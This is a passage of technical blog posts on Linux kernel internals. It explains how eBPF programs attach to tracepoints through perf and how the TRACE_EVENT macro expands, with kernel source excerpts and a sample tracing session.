vhost vdpa bus driver: the code is in ‘drivers/vhost/vdpa.c’. This driver connects the vDPA bus to the vhost subsystem and presents export a vhost char device to userspace. The userspace can then use this vhost dev to bypass the host kernel.
virtio vdpa bus driver: the code is in ‘drivers/virtio/virtio_vdpa.c’. This driver abstract the vdpa device to a virtio device. It creates a virtio device in the virtio bus.

Following shows the data structure relations.

How eBPF program connects with tracepoint

2020-08-09T00:00:00+00:00

In the last post Linux tracing - trace event framework I have discussed the internal of trace event. Now it’s time to look at how the trace event connects with eBPF program.

trace event under perf

When we define perf subsystem, the ‘TRACE_EVENT’ will be defined as following, also the ‘even

            include/trace/perf.h
            #undef DECLARE_EVENT_CLASS
            #define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print)	\
            static notrace void							\
            perf_trace_##call(void *__data, proto)					\
            {									\
                    struct trace_event_call *event_call = __data;			\
                    struct trace_event_data_offsets_##call __maybe_unused __data_offsets;\
                    struct trace_event_raw_##call *entry;				\
                    struct pt_regs *__regs;						\
                    u64 __count = 1;						\
                    struct task_struct *__task = NULL;				\
                    struct hlist_head *head;					\
                    int __entry_size;						\
                    int __data_size;						\
                    int rctx;							\
                                                                                    \
                    __data_size = trace_event_get_offsets_##call(&__data_offsets, args); \
                                                                                    \
                    head = this_cpu_ptr(event_call->perf_events);			\
                    if (!bpf_prog_array_valid(event_call) &&			\
                    __builtin_constant_p(!__task) && !__task &&			\
                    hlist_empty(head))						\
                            return;							\
                                                                                    \
                    __entry_size = ALIGN(__data_size + sizeof(*entry) + sizeof(u32),\
                                    sizeof(u64));				\
                    __entry_size -= sizeof(u32);					\
                                                                                    \
                    entry = perf_trace_buf_alloc(__entry_size, &__regs, &rctx);	\
                    if (!entry)							\
                            return;							\
                                                                                    \
                    perf_fetch_caller_regs(__regs);					\
                                                                                    \
                    tstruct								\
                                                                                    \
                    { assign; }							\
                                                                                    \
                    perf_trace_run_bpf_submit(entry, __entry_size, rctx,		\
                                            event_call, __count, __regs,		\
                                            head, __task);			\
            }

As we know this is very like the ‘probe’ function of ‘trace_event_class’s probe function ‘trace_event_raw_event_##call’. In fact, the ‘trace_event_class’ has a ‘perf_probe’ callback and it will be assigned with ‘perf_trace_##call’.

            include/trace/trace_events.h
            #ifdef CONFIG_PERF_EVENTS

            #define _TRACE_PERF_PROTO(call, proto)					\
                    static notrace void						\
                    perf_trace_##call(void *__data, proto);

            #define _TRACE_PERF_INIT(call)						\
                    .perf_probe		= perf_trace_##call,


            static struct trace_event_class __used __refdata event_class_##call = { \
                    .system			= TRACE_SYSTEM_STRING,			\
                    .define_fields		= trace_event_define_fields_##call,	\
                    .fields			= LIST_HEAD_INIT(event_class_##call.fields),\
                    .raw_init		= trace_event_raw_init,			\
                    .probe			= trace_event_raw_event_##call,		\
                    .reg			= trace_event_reg,			\
                    _TRACE_PERF_INIT(call)						\
            };

When the userspace calls ‘perf_event_open’ syscall and specify a tracepoint to monitor it will call ‘tp_event->class->reg’ callback with ‘TRACE_REG_PERF_REGISTER’. This callback(trace_event_reg) will call ‘tracepoint_probe_register’ with the ‘call->class->perf_probe’ to add the ‘perf_trace_##call’ to the ‘tracepoint’s funcs member.

            kernel/trace/trace_event_perf.c:perf_trace_event_reg
            tp_event->class->reg(tp_event, TRACE_REG_PERF_REGISTER, NULL);

            kernel/trace/trace_events.c
            int trace_event_reg(struct trace_event_call *call,
                            enum trace_reg type, void *data)
            {
                    struct trace_event_file *file = data;

                    WARN_ON(!(call->flags & TRACE_EVENT_FL_TRACEPOINT));
                    switch (type) {
                    case TRACE_REG_REGISTER:
                            return tracepoint_probe_register(call->tp,
                                                            call->class->probe,
                                                            file);
                    case TRACE_REG_UNREGISTER:
                            tracepoint_probe_unregister(call->tp,
                                                    call->class->probe,
                                                    file);
                            return 0;

            #ifdef CONFIG_PERF_EVENTS
                    case TRACE_REG_PERF_REGISTER:
                            return tracepoint_probe_register(call->tp,
                                                            call->class->perf_probe,
                                                            call);
                    case TRACE_REG_PERF_UNREGISTER:
                            tracepoint_probe_unregister(call->tp,
                                                    call->class->perf_probe,
                                                    call);
                            return 0;
                    case TRACE_REG_PERF_OPEN:
                    case TRACE_REG_PERF_CLOSE:
                    case TRACE_REG_PERF_ADD:
                    case TRACE_REG_PERF_DEL:
                            return 0;
            #endif
                    }
                    return 0;
            }

When the ‘trace_xxx_xxx’ is called, the ‘tracepoint’s funcs will be called, so ‘perf_trace_##call’ will be called. In ‘perf_trace_##call’ function, the perf subsys will allocate buffer and call ‘perf_trace_run_bpf_submit’ to commit the buffer. Here will call the ‘trace_call_bpf’ to run the eBPF program.

            void perf_trace_run_bpf_submit(void *raw_data, int size, int rctx,
                                    struct trace_event_call *call, u64 count,
                                    struct pt_regs *regs, struct hlist_head *head,
                                    struct task_struct *task)
            {
                    if (bpf_prog_array_valid(call)) {
                            *(struct pt_regs **)raw_data = regs;
                            if (!trace_call_bpf(call, raw_data) || hlist_empty(head)) {
                                    perf_swevent_put_recursion_context(rctx);
                                    return;
                            }
                    }
                    perf_tp_event(call->event.type, count, raw_data, size, regs, head,
                            rctx, task);
            }

Connect eBPF program with tracepoint

When the userspace calls ‘ioctl(PERF_EVENT_IOC_SET_BPF)’, ‘perf_event_set_bpf_prog’ will be used to handle this request. ‘perf_event_attach_bpf_prog’ then called.

            int perf_event_attach_bpf_prog(struct perf_event *event,
                                    struct bpf_prog *prog)
            {
                    struct bpf_prog_array __rcu *old_array;
                    struct bpf_prog_array *new_array;
                    int ret = -EEXIST;

                    mutex_lock(&bpf_event_mutex);

                    if (event->prog)
                            goto unlock;

                    old_array = event->tp_event->prog_array;
                    if (old_array &&
                    bpf_prog_array_length(old_array) >= BPF_TRACE_MAX_PROGS) {
                            ret = -E2BIG;
                            goto unlock;
                    }

                    ret = bpf_prog_array_copy(old_array, NULL, prog, &new_array);
                    if (ret < 0)
                            goto unlock;

                    /* set the new array to event->tp_event and set event->prog */
                    event->prog = prog;
                    rcu_assign_pointer(event->tp_event->prog_array, new_array);
                    bpf_prog_array_free(old_array);

            unlock:
                    mutex_unlock(&bpf_event_mutex);
                    return ret;
            }

This is quite trivial as it just add the eBPF program to ‘event->tp_event->prog_array’. Here ‘tp_event’ is ‘struct trace_event_call’.

When ‘perf_trace_run_bpf_submit’ calls ‘trace_call_bpf’, this eBPF program will be called. The ‘*(struct pt_regs **)raw_data = regs;’ is quite strange. This commit perf, bpf: allow bpf programs attach to tracepoints explain what this is for. We should also notice if ‘trace_call_bpf’ return non-zero value, the origin ‘perf_tp_event’ will be called and the event data will be copy to the perf subsystem buffer.

            kernel/events/core.c
            void perf_trace_run_bpf_submit(void *raw_data, int size, int rctx,
                                    struct trace_event_call *call, u64 count,
                                    struct pt_regs *regs, struct hlist_head *head,
                                    struct task_struct *task)
            {
                    if (bpf_prog_array_valid(call)) {
                            *(struct pt_regs **)raw_data = regs;
                            if (!trace_call_bpf(call, raw_data) || hlist_empty(head)) {
                                    perf_swevent_put_recursion_context(rctx);
                                    return;
                            }
                    }
                    perf_tp_event(call->event.type, count, raw_data, size, regs, head,
                            rctx, task);
            }

            kernel/trace/bpf_trace.c
            unsigned int trace_call_bpf(struct trace_event_call *call, void *ctx)
            {
                    unsigned int ret;

                    if (in_nmi()) /* not supported yet */
                            return 1;

                    preempt_disable();
                    ...
                    ret = BPF_PROG_RUN_ARRAY_CHECK(call->prog_array, ctx, BPF_PROG_RUN);

            out:
                    __this_cpu_dec(bpf_prog_active);
                    preempt_enable();

                    return ret;
            }


            include/linux/bpf.h
            #define __BPF_PROG_RUN_ARRAY(array, ctx, func, check_non_null)	\
                    ({						\
                            struct bpf_prog **_prog, *__prog;	\
                            struct bpf_prog_array *_array;		\
                            u32 _ret = 1;				\
                            rcu_read_lock();			\
                            _array = rcu_dereference(array);	\
                            if (unlikely(check_non_null && !_array))\
                                    goto _out;			\
                            _prog = _array->progs;			\
                            while ((__prog = READ_ONCE(*_prog))) {	\
                                    _ret &= func(__prog, ctx);	\
                                    _prog++;			\
                            }					\
            _out:							\
                            rcu_read_unlock();			\
                            _ret;					\
                    })

            #define BPF_PROG_RUN_ARRAY(array, ctx, func)		\
                    __BPF_PROG_RUN_ARRAY(array, ctx, func, false)

            #define BPF_PROG_RUN_ARRAY_CHECK(array, ctx, func)	\
                    __BPF_PROG_RUN_ARRAY(array, ctx, func, true)

Linux tracing - trace event framework

2020-08-08T00:00:00+00:00

Sample

This post will show the trace event framework. The most important is the ‘TRACE_EVENT” expand and the connection between tracepoint with ftrace tracer. As usual we will start our discuss with an example. This example is from Using the TRACE_EVENT() macro (Part 3) . There are there files, sillymod.c,silly-trace.h,Makefile.

Then we insmod the module and see the trace print out.

            root@ubuntu:~/silly# insmod ./sillymod.ko
            root@ubuntu:~/silly# cd /sys/kernel/debug/tracing/
            root@ubuntu:/sys/kernel/debug/tracing# ls events/silly/
            enable  filter  me_silly
            root@ubuntu:/sys/kernel/debug/tracing# echo 1 > events/silly/enable 
            root@ubuntu:/sys/kernel/debug/tracing# cat trace
            # tracer: nop
            #
            # entries-in-buffer/entries-written: 6/6   #P:8
            #
            #                              _-----=> irqs-off
            #                             / _----=> need-resched
            #                            | / _---=> hardirq/softirq
            #                            || / _--=> preempt-depth
            #                            ||| /     delay
            #           TASK-PID   CPU#  ||||    TIMESTAMP  FUNCTION
            #              | |       |   ||||       |         |
            silly-thread-30460 [001] .... 178964.333898: me_silly: time=4339634000 count=22
            silly-thread-30460 [001] .... 178965.358104: me_silly: time=4339634256 count=23
            silly-thread-30460 [001] .... 178966.382349: me_silly: time=4339634512 count=24
            silly-thread-30460 [001] .... 178967.405770: me_silly: time=4339634768 count=25
            silly-thread-30460 [001] .... 178968.430004: me_silly: time=4339635024 count=26
            silly-thread-30460 [001] .... 178969.453728: me_silly: time=4339635280 count=27

So the most work we do ourself is to write a MACRO ‘TRACE_EVENT’, then we got can use the ‘trace_me_silly’ function.

            TRACE_EVENT(me_silly,

                    TP_PROTO(unsigned long time, unsigned long count),

                    TP_ARGS(time, count),

                    TP_STRUCT__entry(
                            __field(	unsigned long,	time	)
                            __field(	unsigned long,	count	)
                    ),

                    TP_fast_assign(
                            __entry->time = jiffies;
                            __entry->count = count;
                    ),

                    TP_printk("time=%lu count=%lu", __entry->time, __entry->count)
            );

We will

MACRO magic

Before we go to the detail how ‘TRACE_EVENT’ work, let’s go to a small example also from the LWN posts.

            #define DOGS { C(JACK_RUSSELL), C(BULL_TERRIER), C(ITALIAN_GREYHOUND) }
            #undef C
            #define C(a) ENUM_##a
            enum dog_enums DOGS;
            #undef C
            #define C(a) #a
            char *dog_strings[] = DOGS;
            char *dog_to_string(enum dog_enums dog)
            {
                    return dog_strings[dog];
            } The magic here is the we define the 'C' MACRO two times and change the 'DOGS' MACRO behavior.

The first definition of ‘C’ will make ‘DOGS’ as an enum. So we have this:

            enum dog_enums {ENUM_JACK_RUSSELL, ENUM_BULL_TERRIER, ENUM_ITALIAN_GREYHOUND};

The second definition of ‘C’ will make ‘DOGS’ as string array:

            char *dog_strings = {"JACK_RUSSELL", "BULL_TERRIER", "ITALIAN_GREYHOUND"};

The ‘dog_to_string’ will return a string using the enum as index.

The key idea behind here is that we can define different code using the same information. This is why we can use the ‘trace’ by just define a ‘TRACE_EVENT’ MACRO.

TRACE_EVENT MACRO

In the final part of my last post Linux tracing - kprobe, uprobe and tracepoint. I have disscussed how ‘tracepoint’ is declared and defined. Now it’s time to see how it how it integrates with ftrace.

            #undef TRACE_SYSTEM
            #define TRACE_SYSTEM silly

            #if !defined(_SILLY_TRACE_H) || defined(TRACE_HEADER_MULTI_READ)
            #define _SILLY_TRACE_H

            #include <linux/tracepoint.h>

            TRACE_EVENT(me_silly,

                    TP_PROTO(unsigned long time, unsigned long count),

                    TP_ARGS(time, count),

                    TP_STRUCT__entry(
                            __field(	unsigned long,	time	)
                            __field(	unsigned long,	count	)
                    ),

                    TP_fast_assign(
                            __entry->time = jiffies;
                            __entry->count = count;
                    ),

                    TP_printk("time=%lu count=%lu", __entry->time, __entry->count)
            );

            #endif /* _SILLY_TRACE_H */

            /* This part must be outside protection */
            #undef TRACE_INCLUDE_PATH
            #define TRACE_INCLUDE_PATH .
            #define TRACE_INCLUDE_FILE silly-trace
            #include <trace/define_trace.h>

First using ‘defined(TRACE_HEADER_MULTI_READ)’ we can include this file several times.

First definition of 'TRACE_EVENT'

            linux/tracepoint.h
            #define TRACE_EVENT(name, proto, args, struct, assign, print)	\
                    DECLARE_TRACE(name, PARAMS(proto), PARAMS(args))

Here ‘DECLARE_TRACE’ declare a tracepoint.

Second definition of 'TRACE_EVENT'

            trace/define_trace.h
            #undef TRACE_EVENT
            #define TRACE_EVENT(name, proto, args, tstruct, assign, print)	\
                    DEFINE_TRACE(name)

Here ‘DEFINE_TRACE’ define a tracepoint.

The ‘DECLARE_TRACE’ and ‘DEFINE_TRACE’ has been disscussed in my last post. These two MACRO define a ‘struct tracepoint’ and several function, and all of the ‘tracepoint’ will be stored in the ‘__tracepoints’ section.

Third definition of 'TRACE_EVENT'

In trace/define_trace.h we will include trace/trace_events.h header file.

            trace/define_trace.h
            #include <trace/trace_events.h>

At the begining of the header file we will the ‘TRACE_EVENT’ definition as follows.

            trace/trace_events.h
            #define TRACE_EVENT(name, proto, args, tstruct, assign, print) \
                    DECLARE_EVENT_CLASS(name,			       \
                                    PARAMS(proto),		       \
                                    PARAMS(args),		       \
                                    PARAMS(tstruct),		       \
                                    PARAMS(assign),		       \
                                    PARAMS(print));		       \
                    DEFINE_EVENT(name, name, PARAMS(proto), PARAMS(args));

In this header file, the sub-MACRO ‘DECLARE_EVENT_CLASS’ and ‘DEFINE_EVENT’ will be defined five times. This means ‘TRACE_EVENT’ will be defined five times.

So see the first definition(third in total) in this file.

            #undef __field
            #define __field(type, item)		type	item;

            #undef __field_ext
            #define __field_ext(type, item, filter_type)	type	item;

            #undef __field_struct
            #define __field_struct(type, item)	type	item;

            #undef __field_struct_ext
            #define __field_struct_ext(type, item, filter_type)	type	item;

            #undef __array
            #define __array(type, item, len)	type	item[len];

            #undef __dynamic_array
            #define __dynamic_array(type, item, len) u32 __data_loc_##item;

            #undef __string
            #define __string(item, src) __dynamic_array(char, item, -1)

            #undef __bitmask
            #define __bitmask(item, nr_bits) __dynamic_array(char, item, -1)

            #undef TP_STRUCT__entry
            #define TP_STRUCT__entry(args...) args

            #undef DECLARE_EVENT_CLASS
            #define DECLARE_EVENT_CLASS(name, proto, args, tstruct, assign, print)	\
                    struct trace_event_raw_##name {					\
                            struct trace_entry	ent;				\
                            tstruct							\
                            char			__data[0];			\
                    };								\
                                                                                    \
                    static struct trace_event_class event_class_##name;

            #undef DEFINE_EVENT
            #define DEFINE_EVENT(template, name, proto, args)	\
                    static struct trace_event_call	__used		\
                    __attribute__((__aligned__(4))) event_##name

‘DECLARE_EVENT_CLASS’ defines a ‘struct trace_event_raw_##name’ and all of the data the tracer want to use is defined in this struct. The data entry can be dynamic, the information of the dynamic data is stored in ‘_data_loc##item’ and the real data is stored in ‘__data[0]’.

Fourth definition of 'TRACE_EVENT'

            #undef __field
            #define __field(type, item)

            #undef __field_ext
            #define __field_ext(type, item, filter_type)

            #undef __field_struct
            #define __field_struct(type, item)

            #undef __field_struct_ext
            #define __field_struct_ext(type, item, filter_type)

            #undef __array
            #define __array(type, item, len)

            #undef __dynamic_array
            #define __dynamic_array(type, item, len)	u32 item;

            #undef __string
            #define __string(item, src) __dynamic_array(char, item, -1)

            #undef __bitmask
            #define __bitmask(item, nr_bits) __dynamic_array(unsigned long, item, -1)

            #undef DECLARE_EVENT_CLASS
            #define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print)	\
                    struct trace_event_data_offsets_##call {			\
                            tstruct;						\
                    };

            #undef DEFINE_EVENT
            #define DEFINE_EVENT(template, name, proto, args)

This is quite easy as it just define a ‘struct trace_event_data_offsets_##call’, it stores the ‘dynamic data’s offset.

Fifth definition of 'TRACE_EVENT'

            #undef __entry
            #define __entry field

            #undef TP_printk
            #define TP_printk(fmt, args...) fmt "\n", args

            #undef __get_dynamic_array
            #define __get_dynamic_array(field)	\
                            ((void *)__entry + (__entry->__data_loc_##field & 0xffff))

            #undef __get_dynamic_array_len
            #define __get_dynamic_array_len(field)	\
                            ((__entry->__data_loc_##field >> 16) & 0xffff)

            #undef __get_str
            #define __get_str(field) ((char *)__get_dynamic_array(field))

            #undef __get_bitmask
            #define __get_bitmask(field)						\
                    ({								\
                            void *__bitmask = __get_dynamic_array(field);		\
                            unsigned int __bitmask_size;				\
                            __bitmask_size = __get_dynamic_array_len(field);	\
                            trace_print_bitmask_seq(p, __bitmask, __bitmask_size);	\
                    })

            #undef __print_flags
            #define __print_flags(flag, delim, flag_array...)			\
                    ({								\
                            static const struct trace_print_flags __flags[] =	\
                                    { flag_array, { -1, NULL }};			\
                            trace_print_flags_seq(p, delim, flag, __flags);	\
                    })

            #undef __print_symbolic
            #define __print_symbolic(value, symbol_array...)			\
                    ({								\
                            static const struct trace_print_flags symbols[] =	\
                                    { symbol_array, { -1, NULL }};			\
                            trace_print_symbols_seq(p, value, symbols);		\
                    })

            #undef __print_flags_u64
            #undef __print_symbolic_u64
            #if BITS_PER_LONG == 32
            #define __print_flags_u64(flag, delim, flag_array...)			\
                    ({								\
                            static const struct trace_print_flags_u64 __flags[] =	\
                                    { flag_array, { -1, NULL } };			\
                            trace_print_flags_seq_u64(p, delim, flag, __flags);	\
                    })

            #define __print_symbolic_u64(value, symbol_array...)			\
                    ({								\
                            static const struct trace_print_flags_u64 symbols[] =	\
                                    { symbol_array, { -1, NULL } };			\
                            trace_print_symbols_seq_u64(p, value, symbols);	\
                    })
            #else
            #define __print_flags_u64(flag, delim, flag_array...)			\
                                    __print_flags(flag, delim, flag_array)

            #define __print_symbolic_u64(value, symbol_array...)			\
                                    __print_symbolic(value, symbol_array)
            #endif

            #undef __print_hex
            #define __print_hex(buf, buf_len)					\
                    trace_print_hex_seq(p, buf, buf_len, false)

            #undef __print_hex_str
            #define __print_hex_str(buf, buf_len)					\
                    trace_print_hex_seq(p, buf, buf_len, true)

            #undef __print_array
            #define __print_array(array, count, el_size)				\
                    ({								\
                            BUILD_BUG_ON(el_size != 1 && el_size != 2 &&		\
                                    el_size != 4 && el_size != 8);		\
                            trace_print_array_seq(p, array, count, el_size);	\
                    })

            #undef DECLARE_EVENT_CLASS
            #define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print)	\
            static notrace enum print_line_t					\
            trace_raw_output_##call(struct trace_iterator *iter, int flags,		\
                                    struct trace_event *trace_event)		\
            {									\
                    struct trace_seq *s = &iter->seq;				\
                    struct trace_seq __maybe_unused *p = &iter->tmp_seq;		\
                    struct trace_event_raw_##call *field;				\
                    int ret;							\
                                                                                    \
                    field = (typeof(field))iter->ent;				\
                                                                                    \
                    ret = trace_raw_output_prep(iter, trace_event);			\
                    if (ret != TRACE_TYPE_HANDLED)					\
                            return ret;						\
                                                                                    \
                    trace_seq_printf(s, print);					\
                                                                                    \
                    return trace_handle_return(s);					\
            }									\
            static struct trace_event_functions trace_event_type_funcs_##call = {	\
                    .trace			= trace_raw_output_##call,		\
            };

Here define a ‘trace_raw_output_##call’ function this is used to print the raw event data(in ringbuffer) to tracer’s buffer(output buffer). The raw data is stored in ‘iter->ent’. Also there is a ‘struct trace_event_type_funcs_##call’ has been defined. Also here will process the special ‘print’.

Sixth definition of 'TRACE_EVENT'

            #undef __field_ext
            #define __field_ext(type, item, filter_type)				\
                    ret = trace_define_field(event_call, #type, #item,		\
                                            offsetof(typeof(field), item),		\
                                            sizeof(field.item),			\
                                            is_signed_type(type), filter_type);	\
                    if (ret)							\
                            return ret;

            #undef __field_struct_ext
            #define __field_struct_ext(type, item, filter_type)			\
                    ret = trace_define_field(event_call, #type, #item,		\
                                            offsetof(typeof(field), item),		\
                                            sizeof(field.item),			\
                                            0, filter_type);			\
                    if (ret)							\
                            return ret;

            #undef __field
            #define __field(type, item)	__field_ext(type, item, FILTER_OTHER)

            #undef __field_struct
            #define __field_struct(type, item) __field_struct_ext(type, item, FILTER_OTHER)

            #undef __array
            #define __array(type, item, len)					\
                    do {								\
                            char *type_str = #type"["__stringify(len)"]";		\
                            BUILD_BUG_ON(len > MAX_FILTER_STR_VAL);			\
                            ret = trace_define_field(event_call, type_str, #item,	\
                                            offsetof(typeof(field), item),		\
                                            sizeof(field.item),			\
                                            is_signed_type(type), FILTER_OTHER);	\
                            if (ret)						\
                                    return ret;					\
                    } while (0);

            #undef __dynamic_array
            #define __dynamic_array(type, item, len)				       \
                    ret = trace_define_field(event_call, "__data_loc " #type "[]", #item,  \
                                            offsetof(typeof(field), __data_loc_##item),   \
                                            sizeof(field.__data_loc_##item),	       \
                                            is_signed_type(type), FILTER_OTHER);

            #undef __string
            #define __string(item, src) __dynamic_array(char, item, -1)

            #undef __bitmask
            #define __bitmask(item, nr_bits) __dynamic_array(unsigned long, item, -1)

            #undef DECLARE_EVENT_CLASS
            #define DECLARE_EVENT_CLASS(call, proto, args, tstruct, func, print)	\
            static int notrace __init						\
            trace_event_define_fields_##call(struct trace_event_call *event_call)	\
            {									\
                    struct trace_event_raw_##call field;				\
                    int ret;							\
                                                                                    \
                    tstruct;							\
                                                                                    \
                    return ret;							\
            }

Here we define function ‘trace_event_define_fields_##call’. In this function, it calls ‘trace_define_field’ for every member in ‘TP_STRUCT__entry’. The ‘trace_define_field’ will insert the field infomation to the linked list ‘event_call->class->fields’ lists. It will be used in the ftrace framework.

Seventh definition of 'TRACE_EVENT'

            #undef __entry
            #define __entry entry

            #undef __field
            #define __field(type, item)

            #undef __field_ext
            #define __field_ext(type, item, filter_type)

            #undef __field_struct
            #define __field_struct(type, item)

            #undef __field_struct_ext
            #define __field_struct_ext(type, item, filter_type)

            #undef __array
            #define __array(type, item, len)

            #undef __dynamic_array
            #define __dynamic_array(type, item, len)				\
                    __item_length = (len) * sizeof(type);				\
                    __data_offsets->item = __data_size +				\
                                    offsetof(typeof(*entry), __data);	\
                    __data_offsets->item |= __item_length << 16;			\
                    __data_size += __item_length;

            #undef __string
            #define __string(item, src) __dynamic_array(char, item,			\
                            strlen((src) ? (const char *)(src) : "(null)") + 1)

            /*
            * __bitmask_size_in_bytes_raw is the number of bytes needed to hold
            * num_possible_cpus().
            */
            #define __bitmask_size_in_bytes_raw(nr_bits)	\
                    (((nr_bits) + 7) / 8)

            #define __bitmask_size_in_longs(nr_bits)			\
                    ((__bitmask_size_in_bytes_raw(nr_bits) +		\
                    ((BITS_PER_LONG / 8) - 1)) / (BITS_PER_LONG / 8))

            /*
            * __bitmask_size_in_bytes is the number of bytes needed to hold
            * num_possible_cpus() padded out to the nearest long. This is what
            * is saved in the buffer, just to be consistent.
            */
            #define __bitmask_size_in_bytes(nr_bits)				\
                    (__bitmask_size_in_longs(nr_bits) * (BITS_PER_LONG / 8))

            #undef __bitmask
            #define __bitmask(item, nr_bits) __dynamic_array(unsigned long, item,	\
                                                    __bitmask_size_in_longs(nr_bits))

            #undef DECLARE_EVENT_CLASS
            #define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print)	\
            static inline notrace int trace_event_get_offsets_##call(		\
                    struct trace_event_data_offsets_##call *__data_offsets, proto)	\
            {									\
                    int __data_size = 0;						\
                    int __maybe_unused __item_length;				\
                    struct trace_event_raw_##call __maybe_unused *entry;		\
                                                                                    \
                    tstruct;							\
                                                                                    \
                    return __data_size;						\
            }

This time define a function ‘trace_event_get_offsets_##call’ this is used to calcute the length and offset in every dynmaic member in ‘TP_STRUCT__entry’. It is stored in ‘struct trace_event_data_offsets_##call’ which is defined in the fourth round expand.

Eighth definition of 'TRACE_EVENT'

            #undef __entry
            #define __entry entry

            #undef __field
            #define __field(type, item)

            #undef __field_struct
            #define __field_struct(type, item)

            #undef __array
            #define __array(type, item, len)

            #undef __dynamic_array
            #define __dynamic_array(type, item, len)				\
                    __entry->__data_loc_##item = __data_offsets.item;

            #undef __string
            #define __string(item, src) __dynamic_array(char, item, -1)

            #undef __assign_str
            #define __assign_str(dst, src)						\
                    strcpy(__get_str(dst), (src) ? (const char *)(src) : "(null)");

            #undef __bitmask
            #define __bitmask(item, nr_bits) __dynamic_array(unsigned long, item, -1)

            #undef __get_bitmask
            #define __get_bitmask(field) (char *)__get_dynamic_array(field)

            #undef __assign_bitmask
            #define __assign_bitmask(dst, src, nr_bits)					\
                    memcpy(__get_bitmask(dst), (src), __bitmask_size_in_bytes(nr_bits))

            #undef TP_fast_assign
            #define TP_fast_assign(args...) args

            #undef __perf_count
            #define __perf_count(c)	(c)

            #undef __perf_task
            #define __perf_task(t)	(t)

            #undef DECLARE_EVENT_CLASS
            #define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print)	\
                                                                                    \
            static notrace void							\
            trace_event_raw_event_##call(void *__data, proto)			\
            {									\
                    struct trace_event_file *trace_file = __data;			\
                    struct trace_event_data_offsets_##call __maybe_unused __data_offsets;\
                    struct trace_event_buffer fbuffer;				\
                    struct trace_event_raw_##call *entry;				\
                    int __data_size;						\
                                                                                    \
                    if (trace_trigger_soft_disabled(trace_file))			\
                            return;							\
                                                                                    \
                    __data_size = trace_event_get_offsets_##call(&__data_offsets, args); \
                                                                                    \
                    entry = trace_event_buffer_reserve(&fbuffer, trace_file,	\
                                            sizeof(*entry) + __data_size);		\
                                                                                    \
                    if (!entry)							\
                            return;							\
                                                                                    \
                    tstruct								\
                                                                                    \
                    { assign; }							\
                                                                                    \
                    trace_event_buffer_commit(&fbuffer);				\
            }

Here define function ‘trace_event_raw_event_##call’. This function call ‘trace_trigger_soft_disabled’ to determine whether it will record data. Then ‘trace_event_get_offsets_##call’ to calculate the dynmaic data’s offset and size. Call ‘trace_event_buffer_reserve’ to reverse the space in ringbuffer. The ‘tstruct’ will assign ‘_entry->__data_loc##item’. Commit the ringbuffer by calling ‘trace_event_buffer_commit’.

Nineth definition of 'TRACE_EVENT'

            #undef __entry
            #define __entry REC

            #undef __print_flags
            #undef __print_symbolic
            #undef __print_hex
            #undef __print_hex_str
            #undef __get_dynamic_array
            #undef __get_dynamic_array_len
            #undef __get_str
            #undef __get_bitmask
            #undef __print_array

            #undef TP_printk
            #define TP_printk(fmt, args...) "\"" fmt "\", "  __stringify(args)

            #undef DECLARE_EVENT_CLASS
            #define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print)	\
            _TRACE_PERF_PROTO(call, PARAMS(proto));					\
            static char print_fmt_##call[] = print;					\
            static struct trace_event_class __used __refdata event_class_##call = { \
                    .system			= TRACE_SYSTEM_STRING,			\
                    .define_fields		= trace_event_define_fields_##call,	\
                    .fields			= LIST_HEAD_INIT(event_class_##call.fields),\
                    .raw_init		= trace_event_raw_init,			\
                    .probe			= trace_event_raw_event_##call,		\
                    .reg			= trace_event_reg,			\
                    _TRACE_PERF_INIT(call)						\
            };

            #undef DEFINE_EVENT
            #define DEFINE_EVENT(template, call, proto, args)			\
                                                                                    \
            static struct trace_event_call __used event_##call = {			\
                    .class			= &event_class_##template,		\
                    {								\
                            .tp			= &__tracepoint_##call,		\
                    },								\
                    .event.funcs		= &trace_event_type_funcs_##template,	\
                    .print_fmt		= print_fmt_##template,			\
                    .flags			= TRACE_EVENT_FL_TRACEPOINT,		\
            };									\
            static struct trace_event_call __used					\
            __attribute__((section("_ftrace_events"))) *__event_##call = &event_##call

Here define ‘struct trace_event_class’ named ‘event_class_##call’. and ‘struct trace_event_call’ named ‘event_#call’. The call of the class is ‘trace_event_raw_event_##call’ which is defined in the Eighth round expand. All of the ‘event_##call’ will be stored in the ‘_ftrace_events’ section.

This is story of ‘TRACE_EVNT’, a lot of operation just like a fierce tiger(一顿操作猛如虎). Let’s summary what we have does now.

In the ‘TRACE_EVENT’ we have defined a ‘trace_event_call’ and some related function and structures. The most important is ‘trace_event_class’s probe function ‘trace_event_raw_event_##call’. When the function call trace function(trace_me_silly for example), it will call the ‘tracepoint’s funcs function, this is the ‘probe’ function. In the probe function ‘trace_event_raw_event_##call’, it will construct a ringbuffer and fill the data and commit the buffer, then it will call ‘trace_raw_output_##call’ to copy the ringbuffer data to output buffer. Next let’s see how this happen.

trace event init

The ftrace framework is another complicated things. So here let’s just focus the trace event part.

Some of the important function in the trace event init process is following:

start_kernel() ->early_trace_init() ->trace_init() ->event_trace_enable() ->event_init() ->__trace_early_add_events() ->__trace_early_add_new_event() ->trace_create_new_event()

In event_trace_enable(), it iterates the ‘__ftrace_events’ section. For every ‘trace_event_call’, it will call ‘event_init’. Here we will call ‘call->call->raw_init()’. It’s trace_event_raw_init.

            static int event_init(struct trace_event_call *call)
            {
                    int ret = 0;
                    const char *name;

                    name = trace_event_name(call);
                    if (WARN_ON(!name))
                            return -EINVAL;

                    if (call->class->raw_init) {
                            ret = call->class->raw_init(call);
                            if (ret < 0 && ret != -ENOSYS)
                                    pr_warn("Could not initialize trace events/%s\n", name);
                    }

                    return ret;
            }

trace_event_raw_init calls register_trace_event which will initialize the ‘trace_event’ member named ‘event’ in ‘trace_event_call’. This will insert the ‘trace_event’ in a global ‘event_hash’ hashmap.

event_trace_enable will also insert the ‘trace_event_call’ in the global ‘ftrace_events’ linked lists.

In ‘__trace_early_add_events’s call chain, there will be a ‘trace_event_file’ be created for every ‘trace_event_call’(by ‘trace_create_new_event’).

            static struct trace_event_file *
            trace_create_new_event(struct trace_event_call *call,
                            struct trace_array *tr)
            {
                    struct trace_event_file *file;

                    file = kmem_cache_alloc(file_cachep, GFP_TRACE);
                    if (!file)
                            return NULL;

                    file->event_call = call;
                    file->tr = tr;
                    atomic_set(&file->sm_ref, 0);
                    atomic_set(&file->tm_ref, 0);
                    INIT_LIST_HEAD(&file->triggers);
